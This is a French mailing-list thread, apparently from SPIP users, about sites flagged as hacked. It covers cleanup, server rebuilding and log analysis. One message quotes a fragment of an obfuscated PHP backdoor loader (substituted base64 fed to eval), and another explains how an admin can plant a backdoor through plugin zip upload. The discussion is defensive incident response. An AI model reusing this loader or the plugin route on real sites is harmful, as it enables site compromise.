Bonjour, je reçois ce mail concernant certains de mes sites que me conseillez vous?
Hello,
It came to our attention that your site has been hacked.
The following url is hosting malicious content: [http://nomddoamine/IMG/html/index.html](http://tropictour.sn/IMG/html/index.html)
To prevent further damage to your site or other websites you should clean this up as soon as possible.
A quick tutorial about cleaning up your website can be found here: [http://websitescanner.net/website](http://websitescanner.net/website)
If you have cleaned up the infection and want to make sure your site is really clean,
you can reissue a scan here: [http://websitescanner.net/scan/tropictour.sn](http://websitescanner.net/scan/tropictour.sn)
Please feel free to contact us if you have any further questions.
Kind regards,
Website Scanner malware patrol team
Sjon
idem avec une version à jour. Comme dit dans le groupe devel, c'est manifestement apache qui a une faille puisque j'ai eu le même message avec un site sous magento, en plus de la dizaine sous spip.
idem avec une version à jour. Comme dit dans le groupe devel, c'est
manifestement apache qui a une faille puisque j'ai eu le même message
avec un site sous magento, en plus de la dizaine sous spip.
Il y a quelque chose à faire ou faut-il attendre qu'Apache fasse le boulot ?
--
Ysabeau
idem avec une version à jour. Comme dit dans le groupe devel, c'est
manifestement apache qui a une faille puisque j'ai eu le même message
avec un site sous magento, en plus de la dizaine sous spip.
Est ce que les sites étaient hébergés sur un même compte ?
Un backdoor qui a été uploadé peut très bien remonter l'arborescence des fichiers et déposer n'importe quoi n'importe où s'il en a les droits (parcours des répertoires).
dans ce cas, à voir avec qui gère le serveur car il va falloir
déterminer si possible:
- par ou le gus est rentré
- comment.
Si le système d'exploitation du serveur est compromis, la c'est une
autre paire de manches, ça passe très probablement par une
réinstallation a blanc du serveur avant de nettoyer et de remettre les
sites dessus un par uns après nettoyage. Ca promet quelques heures de
boulot ... Il faudra déterminer le niveau de compromission: si le
bonhomme n'a accès qu'a apache ( le compte qui le fait tourner ), ou
s'il a pris le contrôle complet du serveur.
Pour ma part, dans un cas comme ça, je prend directement un nouveau
serveur que j'installe depuis zéro, et je migre les sites dessus un à un
après les avoir nettoyé hors ligne. Ensuite, je passe le serveur
compromis au lance flammes ...
renomme-le en .txt et regarde-le
Si c'est bien un shell PHP, il se pourrait que ton antivirus t'interdise
de l'enregistrer sur ton disque dur
pas de soucis, je suis sous ubuntu.
Le virus est du code php encodé en base64
$O000O0O00=fopen($OOO0O0O00,'rb');while(--$O00O00O00)fgets($O000O0O00,1024);fgets($O000O0O00,4096);$OO00O00O0=(base64_decode(strtr(fread($O000O0O00,372),'etWxjw1Yd7sR4m5Q2bzJPq6gGKnka+i3F0Mu8TDc/NoSILpVvBZA9hECyUXHOrfl=','ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/')));eval($OO00O00O0);
puis du code crypté lu par le code ci dessus
Sans doute, plus intéressant, j'ai retrouvé le code en regardant dans mes logs spip, tous les POST ne venant pas de rédacteurs et je suis tombé sur une adresse IP qui n'avait pas à faire de POST et il faisait des POST sur ce fichier pat.php
Du coup, j'ai remplacé le module thickbox2 par thickbox3 dans sa dernière version mais je vais regarder pour faire appartenir toute l'arborescence spip à un autre utilisateur que www-data sauf de mémoire tmp/
En fait c’est hyper simple d’installer un backdoor une fois qu’on est admin (via une faille déjà connue) :
il suffit dans l’installation des plugins d’indiquer un zip de son plugin modifié - et SPIP va installer des fichiers php sur le serveur.
Ce mécanisme qui permet de mettre n’importe quel zip dans les plugins/auto est super dangereux en fait – même si c’est bien pratique
Il faudrait mettre en place un système de signatures officielles ou peut-être interdire ce mécanisme